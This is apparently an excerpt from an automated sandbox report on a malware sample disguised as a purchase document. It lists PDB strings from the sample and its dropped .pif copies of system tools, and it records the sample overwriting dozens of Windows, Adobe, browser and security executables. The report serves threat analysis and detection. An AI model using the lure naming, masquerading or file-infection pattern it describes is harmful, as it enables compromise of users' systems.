Source: Binary string: MsSense.pdb source: ymafvvdS.pif, 00000009.00000003.1732759810.000000002A520000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: ymafvvdS.pif, 00000009.00000003.2254314315.00000000247F0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2262955419.0000000024590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000016.00000000.1659735755.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000021.00000002.1771358860.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000022.00000002.1777105344.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000025.00000000.1779655078.0000000000191000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: easinvoker.pdbGCTL source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021D10000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209AA000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021CDF000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.000000002097A000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.00000000024F6000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1580684456.0000000000AF6000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1838933224.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ping.pdb source: esentutl.exe, 0000000B.00000003.1605531348.0000000005490000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000017.00000000.1660461231.0000000000771000.00000020.00000001.01000000.0000000B.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: ymafvvdS.pif, 00000009.00000003.2130368671.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb((( source: ymafvvdS.pif, 00000009.00000003.1948869913.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: locator.pdb source: ymafvvdS.pif, 00000009.00000003.1724937855.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1729612857.0000000026950000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1642151858.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ADelRCP_Exec.pdbCC9 source: ymafvvdS.pif, 00000009.00000003.2097354013.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: ymafvvdS.pif, 00000009.00000003.1967395984.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209AA000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.000000002097A000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1580684456.0000000000AF6000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb source: ymafvvdS.pif, 00000009.00000003.1948869913.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1559563944.0000000005730000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000012.00000002.1647022839.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1659735755.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000021.00000002.1771358860.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000022.00000002.1777105344.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000025.00000000.1779655078.0000000000191000.00000020.00000001.01000000.0000000A.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: ymafvvdS.pif, 00000009.00000003.2312451071.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2322898064.00000000247E0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2313769391.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 0000000B.00000003.1605531348.0000000005490000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000000.1660461231.0000000000771000.00000020.00000001.01000000.0000000B.sdmp
                  Source: Binary string: easinvoker.pdbH source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: ymafvvdS.pif, 00000009.00000003.2057718300.000000002A440000.00000004.00001000.00020000.00000000.sdmp, SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: ymafvvdS.pif, 00000009.00000003.2153849793.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: ymafvvdS.pif, 00000009.00000003.1940616402.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: ymafvvdS.pif, 00000009.00000003.2369897721.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2373134718.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: 64BitMAPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2219413171.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1750131417.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1692731195.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerceptionSimulationService.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1713087935.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb source: ymafvvdS.pif, 00000009.00000003.1687218296.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerfHost.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1723219239.0000000026950000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1718639908.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1717822297.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: ymafvvdS.pif, 00000009.00000003.2352471485.0000000024870000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: ymafvvdS.pif, 00000009.00000003.2199797397.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: ymafvvdS.pif, 00000009.00000003.2130368671.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVClient.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1633670548.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerfHost.pdb source: ymafvvdS.pif, 00000009.00000003.1723219239.0000000026950000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1718639908.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1717822297.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: ymafvvdS.pif, 00000009.00000003.2206197003.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: ymafvvdS.pif, 00000009.00000003.2241637142.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: ymafvvdS.pif, 00000009.00000003.2153849793.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2235576907.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb` source: ymafvvdS.pif, 00000009.00000003.1687218296.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: ymafvvdS.pif, 00000009.00000003.2254314315.00000000247F0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2262955419.0000000024590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdb source: ymafvvdS.pif, 00000009.00000003.1798231706.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1798231706.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: ymafvvdS.pif, 00000009.00000003.1838933224.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: ymafvvdS.pif, 00000009.00000003.2161636209.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb source: ymafvvdS.pif, 00000009.00000003.1608878398.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdb source: ymafvvdS.pif, 00000009.00000003.1692731195.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: ymafvvdS.pif, 00000009.00000003.1642151858.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1608878398.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: ymafvvdS.pif, 00000009.00000003.1664213164.000000002A570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: ymafvvdS.pif, 00000009.00000003.1967395984.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1724937855.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1729612857.0000000026950000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdbX source: ymafvvdS.pif, 00000009.00000003.1787107994.0000000026BA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb source: ymafvvdS.pif, 00000009.00000003.2347088719.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: ymafvvdS.pif, 00000009.00000003.1750131417.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2206197003.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: ymafvvdS.pif, 00000009.00000003.2161636209.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.2347088719.0000000024880000.00000004.00001000.00020000.00000000.sdmp

                  Spreading

                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\vds.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\alg.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\7-Zip\7zFM.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\Spectrum.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\Locator.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\AppVClient.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\7-Zip\7zG.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\VSSVC.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\wbengine.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\SearchIndexer.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\TieringEngineService.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Mozilla Firefox\firefox.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Mozilla Firefox\updater.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\AgentService.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\SensorDataService.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif | System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Code function: 0_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B15908
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,13_2_001A0207
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,13_2_001A589A
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001B3E66 FindFirstFileW,FindNextFileW,FindClose,13_2_001B3E66
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_001A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,13_2_001A4EC1
                  Source: C:\Users\Public\alpha.pif | Code function: 13_2_0019532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,13_2_0019532E
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,22_2_001A589A
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,22_2_001A0207
                  Source: C:\Users\Public\alpha.pif | Code function: 22_2_001B3E66 FindFirstFileW,FindNextFileW,FindClose,22_2_001B3E66
